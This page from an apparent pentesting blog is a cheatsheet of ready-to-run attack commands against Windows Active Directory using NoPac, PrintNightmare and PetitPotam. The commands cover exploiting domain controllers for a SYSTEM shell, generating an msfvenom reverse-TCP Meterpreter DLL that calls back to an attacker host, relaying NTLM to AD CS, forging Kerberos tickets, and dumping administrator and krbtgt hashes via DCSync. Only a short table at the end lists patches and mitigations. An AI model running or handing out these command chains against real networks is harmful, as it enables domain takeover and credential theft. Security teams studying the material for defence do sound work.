Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

Bleeding Edge Vulnerabilities Cheatsheet

NoPac (SamAccountName Spoofing)

Requirements: Standard domain user credentials, ms-DS-MachineAccountQuota > 0

Setup

git clone https://github.com/SecureAuthCorp/impacket.git && cd impacket && python setup.py install
git clone https://github.com/Ridter/noPac.git && cd noPac

Scan

sudo python3 scanner.py DOMAIN/user:pass -dc-ip <DC_IP> -use-ldap

Get Shell (SYSTEM on DC)

sudo python3 noPac.py DOMAIN/user:pass -dc-ip <DC_IP> -dc-host <DC_HOSTNAME> -shell --impersonate administrator -use-ldap

DCSync via NoPac

sudo python3 noPac.py DOMAIN/user:pass -dc-ip <DC_IP> -dc-host <DC_HOSTNAME> --impersonate administrator -use-ldap -dump -just-dc-user DOMAIN/administrator

Pass-the-Ticket with Saved ccache

export KRB5CCNAME=administrator_DC01.DOMAIN.local.ccache
secretsdump.py -just-dc-user DOMAIN/administrator -k -no-pass <DC_FQDN>

PrintNightmare

Requirements: Standard domain user credentials, MS-RPRN/MS-PAR exposed, cube0x0’s Impacket

Setup

pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket && cd impacket && python3 ./setup.py install
git clone https://github.com/cube0x0/CVE-2021-1675.git

Enumerate

rpcdump.py @<TARGET_IP> | egrep 'MS-RPRN|MS-PAR'

Generate Payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ATTACK_IP> LPORT=8080 -f dll > backupscript.dll

Host Payload

sudo smbserver.py -smb2support CompData /path/to/payload/

Start Handler

msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST <ATTACK_IP>; set LPORT 8080; run"

Exploit

sudo python3 CVE-2021-1675.py DOMAIN/user:pass@<TARGET_IP> '\\<ATTACK_IP>\CompData\backupscript.dll'

PetitPotam (MS-EFSRPC)

Requirements: No authentication needed (unauthenticated), AD CS with Web Enrollment enabled

Step 1: Relay to AD CS

sudo ntlmrelayx.py -debug -smb2support --target http://<CA_HOST>/certsrv/certfnsh.asp --adcs --template DomainController

Step 2: Coerce DC Authentication

python3 PetitPotam.py <ATTACK_IP> <DC_IP>

Step 3: Request TGT from Certificate

python3 /opt/PKINITtools/gettgtpkinit.py DOMAIN/DC_HOSTNAME\$ -pfx-base64 <BASE64_CERT> dc01.ccache

Step 4: DCSync

export KRB5CCNAME=dc01.ccache
secretsdump.py -just-dc-user DOMAIN/administrator -k -no-pass <DC_FQDN>

Alternate: Get NT Hash via U2U

python3 /opt/PKINITtools/getnthash.py -key <AS-REP_KEY> DOMAIN/DC_HOSTNAME$
secretsdump.py -just-dc-user DOMAIN/administrator "DC_HOSTNAME$"@<DC_IP> -hashes <LM>:<NT>

Windows: Rubeus + Mimikatz

.\Rubeus.exe asktgt /user:DC_HOSTNAME$ /certificate:<BASE64_CERT> /ptt

mimikatz # lsadump::dcsync /user:DOMAIN\krbtgt

Verify Compromise

crackmapexec smb <DC_IP> -u administrator -H <NT_HASH>

Quick Reference

AttackAuthTool ChainResult
NoPacDomain userscanner.py → noPac.pySYSTEM shell / DCSync
PrintNightmareDomain userrpcdump.py → msfvenom → smbserver.py → CVE-2021-1675.pySYSTEM shell (Meterpreter)
PetitPotamNonentlmrelayx.py → PetitPotam.py → gettgtpkinit.py → secretsdump.pyDCSync

Mitigations

AttackKey Mitigations
NoPacPatch CVE-2021-42278/42287, set ms-DS-MachineAccountQuota to 0
PrintNightmarePatch CVE-2021-34527, disable Print Spooler on DCs if not needed
PetitPotamPatch CVE-2021-36942, disable NTLM on DCs/AD CS, Extended Protection for Auth, Require SSL on CA Web Enrollment